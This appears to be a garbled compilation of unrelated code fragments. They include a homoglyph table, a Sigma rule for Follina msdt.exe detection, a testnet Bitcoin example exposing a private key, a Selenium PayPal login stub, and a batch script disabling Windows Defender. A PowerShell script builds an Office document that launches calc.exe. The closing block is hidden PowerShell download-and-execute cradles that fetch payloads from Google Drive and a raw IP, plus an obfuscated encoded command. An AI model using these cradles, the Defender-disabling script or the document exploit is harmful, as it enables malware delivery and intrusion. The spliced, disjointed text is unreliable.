| Original Letter | Look-Alike(s) |
|---|---|
| a | а ạ ą ä à á ą |
| c | с ƈ ċ |
| d | ԁ ɗ |
| e | е ẹ ė é è |
| g | ġ |
| h | һ |
```yaml
title: Suspicious msdt.exe execution - Office Exploit
id: 97a80ed7-1f3f-4d05-9ef4-65760e634f6b
status: experimental
description: This rule will monitor suspicious arguments passed to the msdt.exe process. These arguments are an indicator of recent Office/Msdt exploitation.
references:
  - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e
  - https://twitter.com/MalwareJake/status/1531019243411623939
author: 'Matthew Brennan'
tags:
  - attack.execution
```
```shell
# In this example we're sending some test bitcoins from an address we control to a brand new test
# address. We'll be sending the coins using the following address, public and private keys (please
# don't abuse).
# address : mtWg6ccLiZWw2Et7E5UqmHsYgrAi5wqiov
# public  : 03bb318b00de944086fad67ab78a832eb1bf26916053ecd3b14a3f48f9fbe0821f
# private : 1af97b1f428ac89b7d35323ea7a68aba8cad178a04eddbbf591f65671bae48a2
# 1. generate a one-shot dummy address we're going to send money to
$ curl -X POST http://api.blockcypher.com/v1/btc/test3/addrs
{
```
```json
[
  {
    "action": "talk",
    "text": "arifa i love you ,please ",
    "language": "en-AU",
    "style": 3
  }
]
```
```python
# Simple example to log into Paypal (far from feature complete)
# Requires: Firefox installed on machine
import getpass
from selenium import webdriver
from selenium.webdriver.common.keys import Keys

LOGIN_URL = 'https://www.paypal.com/signin/'
```
```batch
rem USE AT OWN RISK AS IS WITHOUT WARRANTY OF ANY KIND !!!!!
rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference
rem To also disable Windows Defender Security Center include this
rem reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
rem 1 - Disable Real-time protection
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
```
```java
package org.telegram.example.SendMessage;

import org.apache.http.NameValuePair;
import org.apache.http.client.entity.UrlEncodedFormEntity;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.message.BasicNameValuePair;
import org.json.JSONArray;
import org.json.JSONObject;
import java.io.IOException;
```
```powershell
# target file path
$filename = [Environment]::GetFolderPath('Desktop') + '\Forms.HTML.docx'
$progid = 'Forms.HTML:Image.1'
$clsid = '5512D112-5CC6-11CF-8D67-00AA00BDCE1D'
$html = '<x type="image" src="https://securify.nl/blog/SFY20180801/packager.emf" action="file:///c|/windows/system32/calc.exe">'
# load assemblies for changing the docx (zip) file
[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression.FileSystem')
[void] [Reflection.Assembly]::LoadWithPartialName('System.IO.Compression')
```
```powershell
powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download&id=0B1NUTMCAOKBTdVQzTXlUNHBmZUU',"$env:APPDATA\ps.exe");Start-Process ("$env:APPDATA\ps.exe")
## Version1
c:\Windows\System32\cmd.exe /c powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://45.58.34.196:8080/p')"
## Version2
c:\windows\system32\cmd.exe /c PowErsHelL.EXE -eXecUtiONPoLICy bYPass -NOPROfilE -WinDoWSTYlE hiDden -EnCodeDcOmmAnd IAAoAE4AZQB3AC0ATwBiAEoAZQBDAFQAIABzAFkAcwB0AEUAbQAuAG4AZQBUAC4AdwBlAGIAQwBsAEkARQBOAFQAKQAuAEQATwBXAG4AbABvAGEAZABGAEkAbABlACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBqAHQAYQBiA
```